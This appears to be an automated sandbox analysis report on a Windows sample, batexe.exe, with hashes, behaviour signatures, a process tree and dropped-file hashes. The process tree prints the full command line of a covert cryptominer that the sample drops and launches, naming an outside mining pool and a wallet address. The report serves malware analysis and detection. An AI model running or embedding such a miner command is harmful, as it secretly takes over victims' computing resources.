Analysis
-
max time kernel
293s -
max time network
296s -
platform
windows10-1703_x64 -
resource
win10-20231215-ja -
resource tags
arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
14/02/2024, 04:17
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 32 b2e.exe 1268 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1268 cpuminer-sse2.exe 1268 cpuminer-sse2.exe 1268 cpuminer-sse2.exe 1268 cpuminer-sse2.exe 1268 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/2580-5-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2580 wrote to memory of 32 2580 batexe.exe 74 PID 2580 wrote to memory of 32 2580 batexe.exe 74 PID 2580 wrote to memory of 32 2580 batexe.exe 74 PID 32 wrote to memory of 5008 32 b2e.exe 75 PID 32 wrote to memory of 5008 32 b2e.exe 75 PID 32 wrote to memory of 5008 32 b2e.exe 75 PID 5008 wrote to memory of 1268 5008 cmd.exe 78 PID 5008 wrote to memory of 1268 5008 cmd.exe 78
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:32 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9143.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1268
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10.0MB
MD56a51bb3137fdf37d27ec3c32967f4c74
SHA1e4f0065b6d6afa306ff8469cb8364fe5313efb2c
SHA256936355e1aa9f0fd51335946cd316842147045c9cb7ff31c3ac7e1133c58111d5
SHA512ca40ab86661caa1ef62331b552019b8ac687b98f36c59dd03f861a9ed2c500384357c4dcbae993bc4376bfcc0ed0ad74d0ba8f0530833abf930e0863b623d2bf
-
Filesize
8.0MB
MD5dca9c934b8e5ef624c66ffdacfe3aacc
SHA1091e6c0008abb93bdd5e32d3f7429dbd24d2f12e
SHA256e568891c95b20ee1dd1fb55482c4a2c61313725adb1ad666cc47304a0ad52f71
SHA512be9eb9228785115d611c53d25da42354ce400461e3e7e9eeac2cd0a417dbff4fa0aff2df138709f6ec8626f8d526302923f89f67fcb06fdd762dfa9ddf05392a
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
2.3MB
MD54c04147c386ba8792ac6a03069572a8a
SHA1dda67789fc1d0f2469ca95f01a5c81034853ca6a
SHA256c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd
SHA512a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
3.4MB
MD5c8daa1ce8c442f5f5efdfc488389671f
SHA1eeebea5269f1aa62d89fdfc63fa8623585d9a136
SHA2567da0bb84a7dbe470cd656f55531336eb3a8c3069974c7183e8e6983e2d947c64
SHA512af7cb836c3d6610f9bef72b05ea5ef644f89debd961e743bdb5a4d3a273aef1ecb25a5f4fa49343dbc42c46c6bb2445b081aaf2f0d03c93bb9df526ce44741b5
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
3.6MB
MD55e154e1f428d420fe7bd607f1392df54
SHA10e8b01587f5ccd8ef811ef56c901bb52e3ed87c1
SHA2566726b07a172ebd0d780afc0ba87eb06dbdcdd1c1a43e844b49b039fa1edb35d0
SHA5123a7980433afbb0ed695093761f5e1a1d6d029933aef5581ff3d2bd27017102f55260de8ae87b3f20b785e70c75e6d525a1da9680f5d42adc8f7d8c434db02dd3
-
Filesize
3.4MB
MD5b2c9a888066f5743c6f2a7b561bb1faa
SHA1bf31ee86fb739ae62764ce48c478679da8b41076
SHA25603b52e9ebdb1f54abc9352ba703d6c02dc066a10defa576cf7f346c75ecc412b
SHA5129ae02eda9e5a02d009e94de1bf6961c95980aa978dd1a1245d95150a34cdaca8d594b5854e6e414c661c74b95c34abf3fa73b3e3daedbe97fc68f68e6309e2dc